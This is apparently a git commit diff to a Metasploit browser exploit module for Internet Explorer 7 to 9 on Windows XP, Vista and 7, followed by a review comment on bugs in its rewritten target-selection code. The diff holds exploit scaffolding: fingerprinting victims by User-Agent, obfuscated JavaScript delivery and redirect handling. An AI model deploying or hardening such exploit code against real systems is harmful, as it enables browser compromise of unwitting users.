Additional changes
Updated get_target function, comment for original author, possible bug in handling page redirection.bug/bundler_fix
parent
03815b47f8
commit
2db2c780d6
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # Some secret ninja
|
||||
'unknown', # via ZDI
|
||||
'eromang', # First public discovery
|
||||
'binjo',
|
||||
'sinn3r', # Metasploit
|
||||
|
@ -90,21 +90,28 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
||||
return targets[1] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
||||
return targets[2] #IE 8 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
|
||||
return targets[3] #IE 7 on Windows Vista
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
|
||||
return targets[4] #IE 8 on Windows Vista
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
|
||||
return targets[5] #IE 8 on Windows 7
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
|
||||
return targets[6] #IE 9 on Windows 7
|
||||
else
|
||||
return nil
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
vprint_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
|
@ -294,7 +301,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
js.obfuscate
|
||||
end
|
||||
|
||||
html = <<-EOS
|
||||
html = %Q|
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
|
@ -309,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
@ -345,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status request.headers['User-Agent']
|
||||
agent = request.headers['User-Agent']
|
||||
uri = request.uri
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
|
||||
vprint_status("Requesting: #{uri}")
|
||||
print_status(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending a 404: #{agent.to_s}")
|
||||
|
@ -356,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
vprint_status("Requesting: #{request.uri}")
|
||||
|
||||
if request.uri =~ /#{@html2_name}/
|
||||
if uri =~ /#{@html2_name}/
|
||||
print_status("Loading #{@html2_name}")
|
||||
html = load_html2
|
||||
elsif request.uri =~ /#{@html1_name}/
|
||||
elsif uri =~ /#{@html1_name}/
|
||||
print_status("Loading #{@html1_name}")
|
||||
html = load_html1(cli, my_target)
|
||||
elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
|
||||
elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
|
||||
print_status("Redirecting to #{@html1_name}")
|
||||
send_redirect(cli, "#{this_resource}/#{@html1_name}")
|
||||
return
|
||||
|
|
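Review bot: In the rewritten get_target, `os_name` stays nil whenever the User-Agent reports an NT version other than 5.1, 6.0 or 6.1, so for such a client whose IE digit does match a target name, `t.name.include?(os_name)` receives nil and raises TypeError instead of falling through to `return nil`. The same rewrite calls `agent.scan`, which raises NoMethodError when the request carries no User-Agent header, whereas the `=~` comparisons it appears to replace tolerated nil; because on_request_uri calls get_target before its `my_target.nil?` check, either exception would escape the handler rather than reach the 404 path. I would read the header as `agent.to_s.scan(...)` and add `return nil if ie.empty? or os_name.nil?` right after the `case`, which also lets the loop condition shrink to the two `include?` calls. `MSIE (\d)` captures a single digit, so a two-digit version is truncated; `(\d+)` states the intent. The `def get_target` line is outside the hunk, so the handling of `target` above it is not visible here.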